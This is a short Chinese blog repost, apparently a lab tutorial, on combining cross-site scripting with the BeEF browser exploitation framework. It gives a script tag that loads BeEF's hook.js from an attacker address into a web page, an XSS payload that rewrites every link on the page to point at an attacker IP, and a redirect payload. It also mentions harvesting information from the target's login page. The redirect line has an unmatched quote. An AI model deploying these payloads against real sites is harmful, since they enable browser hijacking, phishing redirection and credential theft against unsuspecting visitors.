码迷,mamicode.com
首页 > 其他好文 > 详细

xss与beef

时间:2020-07-11 12:33:13      阅读:57      评论:0      收藏:0      [点我收藏+]

标签:主页   inf   class   UNC   获取   篡改   onload   mic   信息   

启动beef和apache

技术图片

修改主页,在网页中添加

<script src=‘http://IP:3000/hook.js‘></script>

 

xss漏洞利用

篡改网页a标签中的连接

<script>
window.onload = function(){
var link = document.getElementsByTagName("a");
for(j = 0; j < link.length; j++){
link[j].href = "http://IP";}
}
</script>

跳转到目标网页

<script>window.location=‘http://ip</script>

 

目标登录网页获取信息

技术图片

 

xss与beef

标签:主页   inf   class   UNC   获取   篡改   onload   mic   信息   

原文地址:https://www.cnblogs.com/f1veseven/p/13282932.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!